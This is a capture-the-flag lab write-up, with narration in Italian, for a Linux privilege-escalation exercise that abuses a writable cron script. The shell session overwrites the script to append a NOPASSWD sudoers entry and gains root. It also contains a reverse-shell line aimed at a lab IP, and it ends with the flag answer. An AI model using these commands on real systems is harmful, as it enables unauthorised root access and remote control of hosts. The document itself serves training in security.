Cron Jobs Gone Wild II
Overview¶
Cron is a lifesaver for admins when it comes to doing periodic maintenance tasks on the system. They can even be used in cases where tasks are performed within individual user directories. However, such automations need to be used with caution or can lead to easy privilege escalation attacks.
In this lab environment, you will be provided with GUI access to a Kali machine. A terminal access to the target machine is provided at target.ine.local:8000, which you can access over the browser in Kali.
Objective: Your mission is to get a root shell on the box and retrieve the flag!
Walkthrough¶
Seguendo il video, vedo un file inaccesibile chiamato message sulla home student. Vedo anche che crontab -l non funziona, perciò cerco usando grep se ci sono script che usano quel messaggio.
student@target:~$ grep /usr -r -e "/home/student/message"
/usr/local/share/copy.sh:cp /home/student/message /tmp/message
student@target:~$ cat /usr/local/share/copy.sh
#! /bin/bash
cp /home/student/message /tmp/message
chmod 644 /tmp/message
copy.sh, probabilmente lo attiva un cron. Noto che non c'è ne nano ne vim per modificare il file, uso echo. Lo scopo è mettere il nostro utende nei sudoers con permessi NOPASSWD. student@target:~$ echo "#! /bin/bash\necho "/bin/bash -i >& /dev/tcp/192.168.106.2/9001 0>&1
student@target:~$ cat /usr/local/share/copy.sh
#! /bin/bash
cp /home/student/message /tmp/message
chmod 644 /tmp/message
student@target:~$ grep /usr -r -e "/home/student/message"
/usr/local/share/copy.sh:cp /home/student/message /tmp/message
student@target:~$ cat /usr/local/share/copy.sh
#! /bin/bash
cp /home/student/message /tmp/message
chmod 644 /tmp/message
student@target:~$ echo -e "#! /bin/bash\necho 'student ALL=NOPASSWD:ALL'>>/etc/sudoers" > /usr/local/share/copy.sh
student@target:~$ /usr/local/share/copy.sh
/usr/local/share/copy.sh: line 2: /etc/sudoers: Permission denied
student@target:~$ sudo su
root@target:/home/student#
Answer
697914df7a07bb9b718c8ed258150164